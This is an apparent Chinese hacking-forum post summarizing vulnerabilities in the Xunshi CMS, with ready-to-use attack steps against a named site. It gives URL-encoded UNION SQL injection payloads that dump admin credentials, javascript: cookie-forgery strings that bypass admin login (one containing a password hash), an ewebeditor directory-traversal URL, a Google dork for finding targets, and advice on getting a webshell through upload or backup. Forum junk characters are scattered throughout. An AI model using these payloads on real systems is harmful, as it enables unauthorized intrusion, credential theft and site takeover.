讯时漏洞总结

admin

by:血封忆尘

在网上也有什么讯时三板斧的文章..但我个人觉得有时候靠那三种还是入侵不了（随着版本的更新）
- V& [) }* L* y  D
以下本文总结来自黑防去年第9期杂志上的内容...
0 e& t! Q6 q( g- b# h' }3 R) P0 r
先说一个注入吧:http://www.political-security.com/news_more.asp?lm=2 %41nd 1=2 union %53elect 1,2,3,0x3b%
* J1 _' j) F! d) I" s2 M
* ]& P+ G+ ^- t/ c  m( x* V: A  {26user,0x3b%26pass,6,7,8 %46rom %41dmin union %53elect * %46rom lm where 1=2
1 P) m7 r, x1 w; Y
+ e! D5 D% n+ E# Z记得千万别多了空格，我测试站的时候就发现多了空格注入不出结果的情况
& u4 B+ o2 K: [这里一个注入
& u" R1 s0 ~, V7 z. v3 \" O5 k) R
效果如图:
' I) H4 n; x% d


这样就很轻松可以得到管理用户名与密码..这里md5可以拿去破解.但是现在安全意识的提高.
+ a( a! }/ u! X9 V+ o
& ]; `) C9 c( I7 l! \% |密码复杂了..很难破出来..那么我们可以通过后来cookies欺骗进去
& Q% G# W/ e+ N# V7 b
4 ?# c' n5 B% `* I- o  l) |javascript:alert(document.cookie="adminuser="+escape("用户名"));javascript:alert(document.cookie="adminpass="+escape("md5值")); javascript:alert(document.cookie="admindj="+escape("1"));
& m7 Z3 b5 ~( M. D" n& X8 v
  K: S. N8 L% m: R& m1 u那么这里就会出现一种情况了..如果后台找不到咋办呢??请看下一漏洞让你更轻松达到你想要的效果:

因为讯时结合了ewebeditor程序..而它没有在处理的时候忽视了ewebeditor有个可以列目录的漏洞
0 x+ W4 x' V* Q; w: M
它是做了验证的..但讯时最没做好的地方就是验证..我们可以通过cookies欺骗来绕过验证.从而可以
& n6 G3 n) x, Q" y% \8 B3 w
! a' i5 s9 U$ Q0 o/ F  s3 u6 g访问这页面来列目录..步骤如下:
, V* |4 E& {0 g1 L* [* N' f/ ^
javascript:alert(document.cookie="admindj=1")
, {; o) i& y! t3 y
http://www.political-security.co ... asp?id=46&dir=../..
5 h% O9 V; Q9 t* F% x6 j3 }
. Q( o. E, |" z# S2 F2 C: P效果如图:

" b" w6 ]# i; c  g2 c1 |! x( r4 f
# v: ^5 i+ s; q  v  Y; s
$ O7 e2 b" x+ [0 B5 Z; m' w, |这样全站目录都能瞧了..找到后台目录..进去..

5 a! O9 l" X% n- P" m; K那么进了后台怎么拿shell？？上传--备份就ok了..
& v9 M/ E7 Z0 s) I5 U8 `
8 V! R; H& C! k$ K# q4 v那么有时候有些管理在做后台功能的时候把备份页面去掉了...而他本机里备份页面还是存在的..

* X. `) J3 |. h* g这个我也碰到过一次..你都可以通过列目录来实现..
/ N- _3 g( C  z% f, Q5 D
javascript:alert(document.cookie="admindj=1")
- _7 g8 q5 @- I7 o; d
http://www.political-security.co ... p?action=BackupData
  ^+ B& V+ ^7 D, J* a' @
备份ok..

那么以上两个漏洞都被管理封住了...咋办??上面两个是比较常见的..那么下面一个注入漏洞呢?
$ \! ~% ~5 g( c" X0 ~) E
. f& Z1 K; C8 r5 P( A9 x' a在admin目录下有个admin_lm_edit.asp页面..里面的id没有过滤 那么我们就可以先cookies下
8 {9 c; f9 C3 c, m( {
$ Q3 V# y8 X3 I. ~# m; B然后访问此页面进行注入..步骤如下:
+ S5 |- i$ i; d# x9 ^9 j
javascript:alert(document.cookie="adminuser=admin");alert(document.cookie="admindj=1")
1 C: u! l! t- Y+ F4 r6 o/ t  Y
然后请求admin/admin_chk.asp页面
/ J. W8 z& ]7 m# x$ a
7 T- d# A" m* D% z1 Q输入注入语句admin/admin_lm_edit.asp?id=1 %41nd 1=2 union %53elect 1,2,3,4,id%260x3b%
4 d% M# l$ {  G" ?: P6 ?* C
+ q# W6 ~: [* a$ s0 V' P26user%260x3b%26pass,6,7,8%20%46rom%20%41dmin

. ~# x  t- X# J6 y2 M效果如图所示:
. [- B/ {# V9 z: U
+ B0 `; L$ M& J; z/ R

讯时漏洞2
  Z7 C2 G! m. e( ?: Jgoogle关键字：inurl:news_more.asp?lm2= （关键字很多的自己定义吧）

( {$ |; G% @+ z& t* b. ]. }" G! L1、/admin/admin_news_pl_view.asp?id=1
7 d: h" r6 d, h$ v//id任意 填入以下语句

2、有时1显示错误信息的时候继续往后退2，3，4，我退到11才找到了页面，郁闷！

$ u* G6 r- H- c, Y4 C( A/ B; v9 V

3、|'+dfirst("[user]","[admin]")+chr(124)+dfirst("[pass]","[admin]"),username='

: ?+ c" h0 p. x2 m2 u+ {

$ v! v/ A* ^, [& c1 J: M  \& I爆出管理员帐号和密码了
' z1 N4 ^- D0 x# J9 v4 T


4、cookies进后台
  T  r' W' q4 T( [
javascript:alert(document.cookie="adminuser=" + escape("admin"));alert(document.cookie="adminpass=" + escape("480d6d6b4d57cc903f3bab877248da40"));


# u; K  i$ O- f0 I& l
) e) }) S+ \$ O3 r! i5、后台用了cookie验证，直接访问http://www.political-security.com/admin/admin_index.asp就OK了！

; V7 Y5 h7 G8 K, J# z! |/ |
! z3 k: ]! X0 H/ \! E8 I& i- H# J5 V
5 L6 y' m/ x  C: j9 Y6、后台有上传和备份取SHELL不难。

7、讯时还有个列目录漏洞：http://www.political-security.co ... asp?id=46&dir=../..

3 s1 o2 u" J/ a逍遥复仇：我搞了一个讯时cms4.1版本的没有数据库备份不知道怎么搞SHELL，有的说虽然后台显示但备份页面是存在的，登录后台后访问 http://www.political-security.com/admin/admin_db_backup.asp?action=BackupData，我这个没有，郁闷着呢，谁还有其他办法提供一下，谢谢！

: ?# {4 w3 C/ y' k' I- f( N8 x& p